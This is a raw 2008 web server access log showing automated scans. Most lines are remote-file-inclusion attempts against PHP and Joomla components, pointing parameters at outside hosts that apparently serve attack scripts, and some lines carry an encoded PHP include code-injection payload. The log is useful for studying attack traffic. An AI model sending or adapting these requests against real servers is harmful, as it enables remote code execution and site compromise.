72.29.70.163 - - [23/Mar/2008:05:32:38 -0700] "GET /logs/errors.php?error=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:32:38 -0700] "GET /errors.php?error=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:32:38 -0700] "GET /errors.php?error=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:05:32:48 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:05:33:02 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:33:03 -0700] "GET /logs/access.log//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:33:04 -0700] "GET //db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
204.213.247.235 - - [23/Mar/2008:05:33:04 -0700] "GET /logs//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:33:08 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:33:10 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:33:11 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:33:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:33:37 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:33:38 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:33:39 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:05:33:39 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:05:33:39 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:05:33:39 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:33:44 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [23/Mar/2008:05:33:46 -0700] "GET /logs/access.log//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [23/Mar/2008:05:33:46 -0700] "GET //db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [23/Mar/2008:05:33:46 -0700] "GET /logs//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:05:33:48 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:33:49 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:33:50 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:33:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:05:33:52 -0700] "GET /errors.php?error=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:05:33:52 -0700] "GET /logs/errors.php?error=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:34:04 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:33 -0700] "GET /logs/access.log//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:33 -0700] "GET //db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:33 -0700] "GET /logs//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:37 -0700] "GET /logs/access.log//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:37 -0700] "GET //db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:37 -0700] "GET /logs//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:34:37 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:34:37 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:40 -0700] "GET /logs/access.log//db.php?commonpath=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:40 -0700] "GET //db.php?commonpath=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:34:40 -0700] "GET /logs//db.php?commonpath=http://randersnet.dk/themes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:34:40 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:34:40 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:34:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:34:53 -0700] "GET /logs/access_080124.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:34:54 -0700] "GET /errors.php?error=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:05:34:54 -0700] "GET /logs/errors.php?error=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:35:27 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:36:31 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.62 - - [23/Mar/2008:05:36:35 -0700] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:36:43 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.244.130.90 - - [23/Mar/2008:05:36:55 -0700] "GET /logs/access.log//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.244.130.90 - - [23/Mar/2008:05:36:56 -0700] "GET //db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.244.130.90 - - [23/Mar/2008:05:36:56 -0700] "GET /logs//db.php?commonpath=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:37:16 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:37:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:37:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:37:21 -0700] "GET //faqsupport/include.php?path[docroot]=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:37:31 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.67.217.154 - - [23/Mar/2008:05:37:34 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:37:41 -0700] "GET /logs/access_080122.log/errors.php?error=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:37:41 -0700] "GET /errors.php?error=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:37:41 -0700] "GET /logs/errors.php?error=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:37:45 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:37:45 -0700] "GET /errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:05:37:45 -0700] "GET /logs/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.26.54.6 - - [23/Mar/2008:05:37:47 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.199.108 - - [23/Mar/2008:05:38:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://totonacapan.com.mx/cache/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.67.202.72 - - [23/Mar/2008:05:38:58 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.adviesgroepict-pcou.nl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:39:01 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:39:33 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:39:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:39:35 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:39:40 -0700] "GET //templates/headline_temp.php?nst_inc=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:05:39:58 -0700] "GET //atom.php5?page=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:05:39:58 -0700] "GET /logs//atom.php5?page=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:40:02 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:40:23 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:40:28 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:40:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:40:28 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:40:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:40:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:40:29 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:40:29 -0700] "GET /logs/access_080126.log//mvcw_conver.php?step=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:40:55 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:40:59 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:05:41:00 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:41:01 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.245.106 - - [23/Mar/2008:05:41:02 -0700] "GET /logs/access.log//db.php?commonpath=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [23/Mar/2008:05:41:02 -0700] "GET //db.php?commonpath=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [23/Mar/2008:05:41:03 -0700] "GET /logs//db.php?commonpath=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:05:41:09 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=2601/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:05:41:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=2601/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:05:41:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=2601/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:05:41:09 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:41:18 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:41:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:41:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:41:34 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:42:06 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:05:42:16 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.238.63 - - [23/Mar/2008:05:42:16 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.jef.at/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
89.108.64.57 - - [23/Mar/2008:05:42:26 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.199.108 - - [23/Mar/2008:05:43:06 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://totonacapan.com.mx/cache/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [23/Mar/2008:05:43:06 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://totonacapan.com.mx/cache/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [23/Mar/2008:05:43:07 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://totonacapan.com.mx/cache/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:05:43:29 -0700] "GET /logs/access_080207.log/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [23/Mar/2008:05:43:30 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://totonacapan.com.mx/cache/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:05:44:16 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=2601/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:05:44:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=2601/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:05:44:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=2601/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
